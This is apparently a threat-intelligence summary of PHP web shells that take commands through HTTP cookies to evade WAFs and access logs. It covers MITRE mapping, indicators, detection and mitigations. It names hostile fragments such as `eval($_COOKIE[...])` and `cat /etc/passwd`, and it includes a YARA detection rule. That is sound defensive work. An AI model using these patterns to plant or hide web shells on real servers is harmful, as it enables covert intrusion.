Full Report
Threat actors are increasingly using HTTP cookies as a control channel for PHP-based web shells on Linux servers and to achieve remote code execution, according to findings from the Microsoft Defender Security Research Team. "Instead of exposing command execution through URL parameters or request bodies, these web shells rely on threat actor-supplied cookie values to gate execution,
Analysis Summary
# Tool/Technique: Cookie-Based PHP Web Shells
## Overview
This technique involves the use of PHP-based web shells that utilize HTTP cookie headers as a hidden control channel. By shifting command execution triggers from common vectors like URL parameters or POST request bodies into the `Cookie` header, threat actors can bypass traditional security filters (WAFs) and evade detection in server access logs.
## Technical Details
- **Type**: Technique / Malware (Web Shell)
- **Platform**: Linux (primarily), but applicable to any PHP-supported environment (Windows/Unix)
- **Capabilities**: Remote Code Execution (RCE), evasion of web access logs, conditional execution gating, and persistence.
- **First Seen**: Observed in increasing frequency as of mid-2024 (reported by Microsoft Defender Security Research Team).
## MITRE ATT&CK Mapping
- **TA0003 - Persistence**
- T1505.003 - Server Software Component: Web Shell
- **TA0005 - Defense Evasion**
- T1027 - Obfuscated Files or Information
- T1564.010 - Hide Artifacts: Web Shells (via header-based control)
- **TA0011 - Command and Control**
- T1105 - Ingress Tool Transfer
- T1071.001 - Application Layer Protocol: Web Protocols (HTTP/S)
## Functionality
### Core Capabilities
- **Gated Execution**: The web shell checks for a specific, actor-defined cookie name or value before executing any malicious code. If the cookie is absent, the script may appear benign or return a standard 404/200 OK without processing input.
- **Remote Code Execution (RCE)**: Uses PHP functions such as `eval()`, `assert()`, `system()`, or `shell_exec()` to run commands sent via the cookie.
- **Parameter Obfuscation**: The malicious payload is often Base64 encoded or encrypted within the cookie string, necessitating minimal processing on the server-side to execute.
### Advanced Features
- **Stealth Logging**: Since web servers (like Apache or Nginx) typically log the URI and request method but *not* the full cookie header by default, the commands sent to the shell do not appear in standard access logs.
- **Polymorphism/Variability**: Threat actors can easily change the required cookie key (e.g., `SessionID` vs `AdminToken`) to evade static signature-based detection.
## Indicators of Compromise
- **File Hashes**: *(Specific hashes vary by deployment; monitor for small PHP files containing `eval($_COOKIE[...])`)*
- **File Names**: Often masquerade as legitimate files: `index.php`, `wp-login.php`, `config.php`, `healthcheck.php`.
- **Registry Keys**: N/A (Linux focus).
- **Network Indicators**: High frequency of requests to a single PHP file from a single IP where the `Cookie` header size fluctuates significantly.
- **Behavioral Indicators**:
- `www-data` or `apache` user accounts spawning shell processes (`/bin/sh`, `/bin/bash`).
- PHP processes initiating outbound network connections.
- Unexpected file modifications in the web root directory.
## Associated Threat Actors
- While specific named groups are not listed in the initial Microsoft summary, the technique is a known favorite for **Financially Motivated Actors** and **State-Sponsored Groups** seeking long-term persistence on Linux infrastructure.
## Detection Methods
- **Signature-based detection**: Scan for PHP files utilizing `$_COOKIE` superglobals in conjunction with execution functions like `eval()`, `base64_decode()`, or `str_rot13()`.
- **Behavioral detection**: Monitor for sub-processes of the web server (e.g., `httpd` or `php-fpm`) that execute system commands (`whoami`, `ls`, `cat /etc/passwd`).
- **Log Analysis**: Inspect extended logs (if available) for unusually long or high-entropy cookie values.
- **YARA Rule Snippet**:
yara
rule PHP_Cookie_Webshell {
strings:
$php = "<?php"
$cookie = /_COOKIE\[['"]?[a-zA-Z0-9_-]+['"]?\]/
$exec = /(eval|assert|system|shell_exec|passthru)/
condition:
$php and $cookie and $exec
}
## Mitigation Strategies
- **Prevention measures**: Implement strict file upload controls and disable high-risk PHP functions in `php.ini` using the `disable_functions` directive.
- **Hardening recommendations**:
- Mount web directories as read-only where possible.
- Use File Integrity Monitoring (FIM) to alert on changes to PHP files.
- Configure Web Application Firewalls (WAF) to inspect Cookie headers for suspicious patterns (e.g., encoded PHP code).
## Related Tools/Techniques
- **China Chopper**: A classic web shell that utilizes similar minimal-footprint execution.
- **In-Memory Web Shells**: Web shells that reside only in the memory of the web server process.
- **Header Injection**: Using `User-Agent` or `Referer` headers for command delivery.